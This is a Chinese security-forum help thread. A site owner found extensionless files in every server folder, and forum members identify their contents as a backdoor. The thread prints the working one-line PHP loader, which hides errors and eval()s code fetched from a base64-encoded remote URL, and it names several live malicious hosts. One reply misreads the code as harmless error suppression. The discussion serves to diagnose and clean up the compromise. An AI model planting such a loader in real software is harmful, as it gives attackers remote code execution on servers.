吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 1596|回复: 7
收起左侧

【求助】无意间发现服务器网站里有很多这样的文件

[复制链接]
不羁zz 发表于 2024-4-22 21:50
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
各种名为“web”,"image","log",“cache”并且没有后缀的文件,每个文件夹下都有。内容为:
[PHP] 纯文本查看 复制代码
<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));?>

且都一致。请教大神,这段代码有什么作用?能做什么?有什么危害?该如何防止再次发生?

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

javasu 发表于 2024-4-23 11:05
明显是被人挂马啦,后边就是执行base64解码地址的内容
LeonardFrye 发表于 2024-4-30 14:15
网站被人搞后门了,通过这个函数连接base64后面加密的数据,把服务停一停,找找有没有马,以后挂个日志啥的方便检测
chenxk 发表于 2024-4-23 10:47
这段代码是用于关闭 PHP 错误报告的。通过设置 ini_set("display_errors", "off");,PHP 将不会显示错误信息。这通常在生产环境中使用,以避免向用户展示敏感的错误信息。
最初的未来 发表于 2024-4-24 09:46
使用ini_set函数关闭了错误显示(display_errors设置为"off"),这意味着任何错误都不会显示给终端用户。

使用eval函数执行了一段由base64_decode解码后的字符串内容。

l-l ttp://8.laite002.cc/jsc/xgjsc.txt
xgjsc.txt 内容是一个 PHP 的文件



ttp://mulu.laite002.cc:81
ttp://jschl.nn02.cc

综合判断, 你的网站被黑了,,, 文件上传漏洞和命令执行漏洞。
解决: 买个 WAF 设备,更新代码,更新网站的底层应用
jindunanquan 发表于 2024-5-16 19:17
这段代码看起来是 PHP 中的一段远程代码执行(Remote Code Execution, RCE)攻击代码。它试图通过执行远程的恶意代码来获取对受感染服务器的控制权。

ini_set("display_errors", "off");: 这一行代码试图关闭 PHP 的错误显示。这样做可能是为了隐藏执行中的任何错误消息,以防止被发现。

eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));: 这是关键的恶意代码。它使用  函数从远程服务器下载一个文件,并将其内容传递给  函数执行。这个文件的 URL 被使用了 Base64 编码,因此需要先解码才能知道其真实地址。file_get_contentseval

让我们解码 Base64 编码的部分来获取文件的实际 URL:

php
echo base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==');
解码后得到的 URL 是 ,它指向了一个远程的文本文件。http://8.laite002.cc/xgjsc.txt


如果你是在处理这段代码的环境下工作,强烈建议立即停止执行该代码,并对服务器进行全面的安全审查和修复。
flyjerry 发表于 2024-5-19 16:56
这是木马么?学艺不精继续向高手学习
小哲网络 发表于 2024-5-29 15:11
用D盾试下呢!
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-14 05:07

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表